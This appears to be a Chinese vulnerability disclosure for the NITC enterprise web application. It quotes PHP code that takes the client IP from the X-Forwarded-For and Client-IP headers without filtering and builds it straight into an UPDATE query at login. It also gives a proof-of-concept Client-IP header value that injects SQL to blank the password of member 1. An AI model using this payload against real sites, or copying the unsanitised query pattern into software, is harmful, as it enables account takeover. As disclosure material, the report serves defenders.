NITC企业版SQL注入,可重置任意用户密码

漏洞作者: 路人甲

 

function getip( )
{
    if ( isset( $_SERVER ) )
    {
        if ( isset( $_SERVER[HTTP_X_FORWARDED_FOR] ) )
        {
            $realip = $_SERVER[HTTP_X_FORWARDED_FOR];
            return $realip;
        }
        if ( isset( $_SERVER[HTTP_CLIENT_IP] ) )
        {
            $realip = $_SERVER[HTTP_CLIENT_IP];
            return $realip;
        }
        $realip = $_SERVER[REMOTE_ADDR];
        return $realip;
    }
    if ( getenv( "HTTP_X_FORWARDED_FOR" ) )
    {
        $realip = getenv( "HTTP_X_FORWARDED_FOR" );
        return $realip;
    }
    if ( getenv( "HTTP_CLIENT_IP" ) )
    {
        $realip = getenv( "HTTP_CLIENT_IP" );
        return $realip;
    }
    $realip = getenv( "REMOTE_ADDR" );
    return $realip;
}

ip获取没有进行过滤,导致网站多处sql注入

if ( $action == "login" )
{
      ....
      $ip = getip( );
            $_SESSION['member_email'] = $email;
            $_SESSION['member_id'] = $result['member_id'];
            $_SESSION['state'] = $result['state'];
            $_SESSION['member_name'] = $result['name'];
            $site->table( "member" )( "update ".$site->table( "member" ).( " set last_ip='".$ip."',last_time='" ).date( "Y-m-d H:i:s", time( ) )."' where member_id=".$result['member_id'] );
}

此处 用户登录的时候,记录用户登录IP操作,由于update用户数据,可以直接利用sql注入update任意用户的密码。

POC: head头上加入 client-ip:',password='' where member_id=1#

漏洞证明:

POC: head头上加入 client-ip:',password='' where member_id=1#

发表评论